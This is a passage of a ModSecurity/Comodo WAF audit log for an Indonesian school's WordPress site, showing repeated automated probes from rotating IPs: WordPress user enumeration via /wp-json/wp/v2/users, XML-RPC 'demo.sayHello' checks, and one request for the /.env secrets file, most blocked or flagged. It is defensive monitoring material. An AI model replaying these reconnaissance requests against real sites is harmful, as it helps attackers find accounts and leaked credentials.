"apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747504206334581 3250 (- - -) Stopwatch2: 1747504206334581 3250; combined=1532, p1=398, p2=1096, p3=0, p4=0, p5=37, sr=59, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2edd4e7c-Z-- --df43d724-A-- [18/May/2025:00:50:11 +0700] aCjMU3yxdQCiyU1ENFdFHQAAABQ 103.236.140.4 55360 103.236.140.4 8181 --df43d724-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.35.135 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.35.135 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --df43d724-C-- demo.sayHello --df43d724-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --df43d724-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747504211171174 5454 (- - -) Stopwatch2: 1747504211171174 5454; combined=3954, p1=645, p2=3058, p3=29, p4=31, p5=137, sr=73, sw=54, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --df43d724-Z-- --3421ff41-A-- [18/May/2025:00:51:01 +0700] aCjMhem4kjNN-hEbWjJMSwAAAFc 103.236.140.4 57402 103.236.140.4 8181 --3421ff41-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.62.13 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.62.13 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3421ff41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3421ff41-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747504261774921 2749 (- - -) Stopwatch2: 1747504261774921 2749; combined=1575, p1=472, p2=1076, p3=0, p4=0, p5=27, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3421ff41-Z-- --a0b44a39-A-- [18/May/2025:00:51:10 +0700] aCjMjum4kjNN-hEbWjJMXwAAAFg 103.236.140.4 57796 103.236.140.4 8181 --a0b44a39-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.62.13 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.62.13 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a0b44a39-C-- demo.sayHello --a0b44a39-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a0b44a39-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747504270717492 5535 (- - -) Stopwatch2: 1747504270717492 5535; combined=4144, p1=472, p2=3433, p3=42, p4=56, p5=82, sr=58, sw=59, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a0b44a39-Z-- --cfa8133e-A-- [18/May/2025:00:51:40 +0700] aCjMrOm4kjNN-hEbWjJMyAAAAEs 103.236.140.4 59904 103.236.140.4 8181 --cfa8133e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.90 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --cfa8133e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cfa8133e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747504300474135 2326 (- - -) Stopwatch2: 1747504300474135 2326; combined=1251, p1=410, p2=814, p3=0, p4=0, p5=26, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cfa8133e-Z-- --99b48c0d-A-- [18/May/2025:00:52:46 +0700] aCjM7nyxdQCiyU1ENFdJhwAAAAo 103.236.140.4 36794 103.236.140.4 8181 --99b48c0d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.108.251 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.108.251 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --99b48c0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --99b48c0d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747504366899964 2008 (- - -) Stopwatch2: 1747504366899964 2008; combined=1054, p1=357, p2=674, p3=0, p4=0, p5=23, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --99b48c0d-Z-- --96fcc55b-A-- [18/May/2025:00:52:55 +0700] aCjM9-m4kjNN-hEbWjJOoQAAAEk 103.236.140.4 37472 103.236.140.4 8181 --96fcc55b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.108.251 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.108.251 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --96fcc55b-C-- demo.sayHello --96fcc55b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --96fcc55b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747504375503549 4949 (- - -) Stopwatch2: 1747504375503549 4949; combined=3448, p1=571, p2=2696, p3=26, p4=26, p5=75, sr=64, sw=54, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --96fcc55b-Z-- --0c903d5e-A-- [18/May/2025:00:53:36 +0700] aCjNIATOsBn9MSWb6WKFiAAAAIc 103.236.140.4 40568 103.236.140.4 8181 --0c903d5e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.207 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.207 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0c903d5e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c903d5e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747504416289151 3113 (- - -) Stopwatch2: 1747504416289151 3113; combined=1435, p1=387, p2=1000, p3=0, p4=0, p5=47, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c903d5e-Z-- --12eb6b60-A-- [18/May/2025:00:53:49 +0700] aCjNLXyxdQCiyU1ENFdL7wAAAAI 103.236.140.4 41540 103.236.140.4 8181 --12eb6b60-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.207 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.207 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --12eb6b60-C-- demo.sayHello --12eb6b60-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --12eb6b60-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747504429450915 4809 (- - -) Stopwatch2: 1747504429450915 4809; combined=3460, p1=450, p2=2814, p3=35, p4=37, p5=74, sr=55, sw=50, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --12eb6b60-Z-- --f6dc4721-A-- [18/May/2025:01:00:34 +0700] aCjOwhKi5m5upc8uMd7k1wAAAMY 103.236.140.4 41484 103.236.140.4 8181 --f6dc4721-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.171.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.171.101 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f6dc4721-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6dc4721-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747504834318144 2463 (- - -) Stopwatch2: 1747504834318144 2463; combined=1391, p1=428, p2=936, p3=0, p4=0, p5=27, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f6dc4721-Z-- --2d050f45-A-- [18/May/2025:01:00:39 +0700] aCjOx3yxdQCiyU1ENFdVYwAAAAo 103.236.140.4 41876 103.236.140.4 8181 --2d050f45-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.171.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.171.101 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2d050f45-C-- demo.sayHello --2d050f45-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2d050f45-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747504839757281 5871 (- - -) Stopwatch2: 1747504839757281 5871; combined=4426, p1=596, p2=3596, p3=39, p4=53, p5=85, sr=56, sw=57, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2d050f45-Z-- --b8f7a027-A-- [18/May/2025:01:03:00 +0700] aCjPVOm4kjNN-hEbWjJfBAAAAEM 103.236.140.4 52578 103.236.140.4 8181 --b8f7a027-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.85 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.85 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b8f7a027-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b8f7a027-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747504980686448 22441 (- - -) Stopwatch2: 1747504980686448 22441; combined=1903, p1=505, p2=1365, p3=0, p4=0, p5=33, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b8f7a027-Z-- --56519c04-A-- [18/May/2025:01:03:09 +0700] aCjPXRKi5m5upc8uMd7onAAAAMU 103.236.140.4 53280 103.236.140.4 8181 --56519c04-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.85 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.85 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --56519c04-C-- demo.sayHello --56519c04-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --56519c04-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747504989962900 6470 (- - -) Stopwatch2: 1747504989962900 6470; combined=4935, p1=646, p2=3957, p3=42, p4=41, p5=144, sr=71, sw=105, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --56519c04-Z-- --702a575f-A-- [18/May/2025:01:07:49 +0700] aCjQdRKi5m5upc8uMd7xxAAAAM4 103.236.140.4 45134 103.236.140.4 8181 --702a575f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 70.39.75.187 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 70.39.75.187 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --702a575f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --702a575f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747505269531907 868 (- - -) Stopwatch2: 1747505269531907 868; combined=292, p1=258, p2=0, p3=0, p4=0, p5=34, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --702a575f-Z-- --c2ed0b77-A-- [18/May/2025:01:20:34 +0700] aCjTcum4kjNN-hEbWjJ5xQAAAE8 103.236.140.4 45882 103.236.140.4 8181 --c2ed0b77-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.108.68 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.108.68 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c2ed0b77-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c2ed0b77-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747506034827659 2555 (- - -) Stopwatch2: 1747506034827659 2555; combined=1110, p1=399, p2=682, p3=0, p4=0, p5=28, sr=61, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c2ed0b77-Z-- --9da8b170-A-- [18/May/2025:01:20:44 +0700] aCjTfATOsBn9MSWb6WKy9AAAAI0 103.236.140.4 46612 103.236.140.4 8181 --9da8b170-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.108.68 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.108.68 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9da8b170-C-- demo.sayHello --9da8b170-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9da8b170-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747506044517286 6172 (- - -) Stopwatch2: 1747506044517286 6172; combined=4845, p1=633, p2=3963, p3=40, p4=42, p5=102, sr=85, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9da8b170-Z-- --be013a5e-A-- [18/May/2025:01:21:21 +0700] aCjToRKi5m5upc8uMd4JNAAAANA 103.236.140.4 49454 103.236.140.4 8181 --be013a5e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.41.155 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.41.155 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --be013a5e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --be013a5e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747506081341675 3480 (- - -) Stopwatch2: 1747506081341675 3480; combined=1741, p1=565, p2=1146, p3=0, p4=0, p5=30, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --be013a5e-Z-- --01a63213-A-- [18/May/2025:01:21:33 +0700] aCjTrem4kjNN-hEbWjJ7gwAAAFc 103.236.140.4 50448 103.236.140.4 8181 --01a63213-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.41.155 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.41.155 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --01a63213-C-- demo.sayHello --01a63213-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --01a63213-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 